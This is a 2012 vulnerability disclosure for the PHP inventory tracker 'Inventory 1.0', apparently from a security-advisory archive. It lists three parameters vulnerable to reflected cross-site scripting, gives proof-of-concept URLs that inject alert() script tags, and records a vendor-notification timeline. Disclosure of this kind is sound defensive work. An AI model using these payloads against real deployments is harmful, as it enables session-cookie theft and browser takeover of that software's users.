Inventory 1.0 Multiple XSS Vulnerabilities

2012-10-29T00:00:00
ID SECURITYVULNS:DOC:28691
Type securityvulns
Reporter Securityvulns
Modified 2012-10-29T00:00:00

Description

Exploit Title: Inventory 1.0 Multiple XSS Vulnerabilities

Date: 10/19/12

Author: G13

Twitter: @g13net

Software Site: https://github.com/farevalod/inventory

Version: 1.0

Category: webapp (php)

dc585

ToC

0x01 Description 0x02 XSS 0x03 Vendor Notification

0x01 Description

PHP + SQL Inventory tracking system

0x02 XSS

The Inventory application has multiple pages and parameters that are vulnerable to cross-site scripting. This vulnerabilities could be used to steal session cookies or take control of a client's browser.

-----Vulnerable Pages----- http://localhost/inventory/consulta_fact.php?fact_num=[XSS] http://localhost/inventory/newinventario.php?sn=[XSS] http://localhost/inventory/newtransact.php?ref=[XSS]

-----PoC Exploit----- http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</script> http://localhost/inventory/newinventario.php?sn=<script>alert(100)</script> http://localhost/inventory/newtransact.php?ref=<script>alert(100)</script>

0x03 Vendor Notification

10/19/12 - Vendor Notified 10/26/12 - No response, disclosure